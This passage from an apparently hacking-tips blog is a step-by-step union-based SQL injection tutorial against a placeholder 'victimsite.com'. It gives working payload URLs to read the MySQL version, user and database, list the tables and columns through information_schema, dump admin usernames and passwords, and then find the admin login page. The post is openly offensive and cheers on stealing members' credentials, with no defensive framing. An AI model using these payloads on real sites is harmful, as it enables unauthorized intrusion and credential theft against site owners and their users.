It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--



It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--



http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--


If the above is not working,then try this:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--




Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to
find the table name of the database. Replace the 3 with
"group_concat(table_name) and add the "from information_schema.tables
where table_schema=database()"

For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(table_name),4,5,6,7 from information_schema.tables
where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names.
(user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where
table_schema=database()--" with "FROM information_schema.columns WHERE
table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union
select 1,2,group_concat(column_name),4,5,6,7 from
information_schema.columns where table_name=CHAR(97, 100, 109, 105,
110)--


Now it will show the list of columns.
like
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas
?
s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--


Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:
Download

Read more ...
All Tips And Tricks Information Computer tricks in tamil Hindi Mobile tips tricks 2013 HAcking tricks Airtel Idea Vodafone Tata Docomo Tricks internet